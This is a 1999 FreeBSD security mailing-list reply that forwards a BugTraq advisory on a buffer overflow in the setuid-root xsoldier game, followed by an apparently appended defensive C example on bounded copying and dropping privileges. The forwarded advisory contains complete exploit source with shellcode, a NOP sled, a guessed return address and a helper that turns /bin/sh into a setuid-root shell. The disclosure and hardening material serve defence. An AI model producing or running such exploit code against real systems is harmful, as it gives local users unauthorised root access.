Date: Thu, 16 Dec 1999 00:11:21 -0500 (EST)
From: Spidey <beaupran@iro.umontreal.ca>
To: Chris England <cengland@obscurity.org>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: From BugTraq - FreeBSD 3.3 xsoldier root exploit (fwd)
Message-ID: <14424.29817.586093.109020@anarcat.dyndns.org>
References: <Pine.BSO.4.10.9912152030130.29021-100000@obscurity.org>
A patch has been committed today in the ports collection. I have not tested either the patched or the unpatched proggies...

The AnarCat

---

Big Brother told Chris England to write, at 20:36 of December 15:
> I personally have not tested this. I'm not too big on games, but I would
> recommend anyone who has this game installed suid-root to test the snippet
> code against it and post the results to this list.
>
> Cheers,
> -Chris England
>
>
> ---------- Forwarded message ----------
> Date: Wed, 15 Dec 1999 17:11:36 MST
> From: Brock Tellier <btellier@USA.NET>
> To: BUGTRAQ@SECURITYFOCUS.COM
> Subject: FreeBSD 3.3 xsoldier root exploit
>
> Greetings,
>
> OVERVIEW
> A vulnerability in FreeBSD 3.3's xsoldier will allow any user to gain root
> access. This user does not have to have a valid $DISPLAY to exploit this.
>
> BACKGROUND
> Only FreeBSD 3.3-RELEASE has been tested. xsoldier, suid-root by default, was
> installed as part of the X11 games packages via /stand/sysinstall.
>
> DETAILS
> More problems with FreeBSD 3.3 ports. This time with xsoldier, a suid-root
> game. A simple overflow in the -display option allows any user to gain root.
> Although xsoldier only runs under X, a long -display arg on the CL will allow
> us to gain root.
>
> --- xsoldierx.c ---
> /*
>  * xsoldier exploit for Freebsd-3.3-RELEASE
>  * Drops a suid root shell in /bin/sh
>  * Brock Tellier btellier@usa.net
>  */
>
> #include <stdio.h>
> #include <stdlib.h>   /* atoi(), system() */
> #include <unistd.h>   /* execl() */
>
> /* FreeBSD execve() shellcode; the trailing path is the helper it runs */
> char shell[]= /* mudge@l0pht.com */
> "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
> "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
> "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
> "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";
>
> /* helper run as root by the shellcode: makes /bin/sh setuid root */
> #define CODE "#include <sys/stat.h>\nint main(void) { chmod(\"/bin/sh\", 0004555); return 0; }\n"
>
> /* write and compile the helper to /tmp/ui before triggering the overflow */
> void buildui() {
> FILE *fp;
> char cc[100];
> fp = fopen("/tmp/ui.c", "w");
> fputs(CODE, fp);
> fclose(fp);
> snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
> system(cc);
> }
>
> int main (int argc, char *argv[] ) {
> int x = 0;
> int y = 0;
> int offset = 0;
> int bsize = 4400;
> char buf[bsize];
> unsigned int eip = 0xbfbfdb65; /* works for me */
> buildui();
>
> /* optional argv[1]: nudge the guessed return address */
> if (argv[1]) {
> offset = atoi(argv[1]);
> eip = eip + offset;
> }
> fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE <btellier@usa.net>\n");
> fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
> fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);
>
> /* NOP sled: any landing point inside it slides into the shellcode */
> for ( x = 0; x < 4325; x++) buf[x] = 0x90;
> fprintf(stderr, "NOPs to %d\n", x);
>
> for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
> fprintf(stderr, "Shellcode to %d\n",x);
>
> /* overwrite the saved return address, little-endian */
> buf[x++] = eip & 0x000000ff;
> buf[x++] = (eip & 0x0000ff00) >> 8;
> buf[x++] = (eip & 0x00ff0000) >> 16;
> buf[x++] = (eip & 0xff000000) >> 24;
> fprintf(stderr, "eip to %d\n",x);
>
> buf[x] = '\0'; /* terminate right after the address; buf[bsize] is one past the end */
>
> /* the over-long -display value is what overflows xsoldier's buffer */
> execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL);
>
> return 0;
> }
>
> -------
>
> Brock Tellier
> UNIX Systems Administrator
> Chicago, IL, USA
> btellier@usa.net
>
> ____________________________________________________________________
> Get free email and a permanent address at http://www.netaddress.com/?N=1
>
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

--
If the image gives the illusion of knowing,
it is because the adage claims that, in order to believe,
all that would matter is to see.
Lofofora
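The bug class behind the forwarded advisory, as an added example that is not part of this thread and not xsoldier's source (which is not on this page): a setuid-root program copies the attacker-controlled -display argument into a fixed-size stack buffer, so an over-long value overwrites the saved return address. The model below puts the unbounded-copy pattern beside a bounded replacement and adds the second defence a setuid game should have, dropping root before any argv byte is parsed. DISPLAY_MAX, the function names and the option-handling loop are all assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Assumed buffer size for the model; xsoldier's real figure is not on
 * this page (the posted exploit sends a 4396-byte -display value, so
 * the real buffer is somewhere below that). */
#define DISPLAY_MAX 256

/* strnlen() without relying on the platform exposing it. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* VULNERABLE pattern (model, not xsoldier's code): the -display value is
 * copied into a fixed-size stack buffer with no length check.  Anything
 * longer than DISPLAY_MAX runs over the saved return address, which the
 * posted exploit fills with a NOP sled, shellcode and a guessed address.
 * Only ever call this with a trusted, short string. */
int open_display_unsafe(const char *display_arg)
{
    char display[DISPLAY_MAX];

    strcpy(display, display_arg);          /* the bug */
    return (int)strlen(display);
}

/* HARDENED form: refuse anything that does not fit, and bound the copy
 * itself so the buffer stays intact even if the check is edited away
 * later.  Returns the copied length, or -1 on a bad or over-long value. */
int open_display_safe(const char *display_arg, char *out, size_t out_len)
{
    size_t n;

    if (display_arg == NULL || out == NULL || out_len == 0)
        return -1;
    n = bounded_len(display_arg, out_len);
    if (n >= out_len)                      /* no room for the NUL */
        return -1;
    memcpy(out, display_arg, n);
    out[n] = '\0';
    return (int)n;
}

/* Independent defence for a setuid game: give up root before any
 * attacker-controlled byte (argv, environment, X protocol) is parsed.
 * Group first, then user, and verify the effective ids really changed.
 * Returns 0 on success, -1 otherwise. */
int drop_privileges(void)
{
    if (setgid(getgid()) != 0)
        return -1;
    if (setuid(getuid()) != 0)
        return -1;
    if (geteuid() != getuid() || getegid() != getgid())
        return -1;
    return 0;
}

/* Option handling the way a setuid game should do it: privileges gone
 * first, then the bounded copy for -display.  Returns 0 on success, -1 on
 * a missing or over-long value, -2 if privileges could not be dropped. */
int handle_args(int argc, char **argv, char *display, size_t display_len)
{
    int i;

    if (drop_privileges() != 0)
        return -2;
    display[0] = '\0';
    for (i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-display") == 0) {
            if (i + 1 >= argc)
                return -1;                 /* -display with no value */
            if (open_display_safe(argv[++i], display, display_len) < 0)
                return -1;
        }
    }
    return 0;
}

int main(int argc, char **argv)
{
    char display[DISPLAY_MAX];
    int rc = handle_args(argc, argv, display, sizeof display);

    if (rc != 0) {
        fprintf(stderr, "bad or over-long -display argument (rc=%d)\n", rc);
        return 1;
    }
    printf("display=\"%s\"\n", display);
    return 0;
}
```

Build with `cc -o display-model display-model.c` and feed it a sled-sized value, e.g. `./display-model -display "$(head -c 5000 /dev/zero | tr '\0' A)"`, to see the rejection path that the real binary lacked. A game that genuinely needs root only for its high-score file should open that file at startup and then drop privileges as above, so that option parsing, X setup and everything after run with the invoking user's rights. To see whether a FreeBSD box still carries the setuid binary the advisory names, `ls -l /usr/X11R6/bin/xsoldier` shows an `s` in the owner execute position when the bit is set.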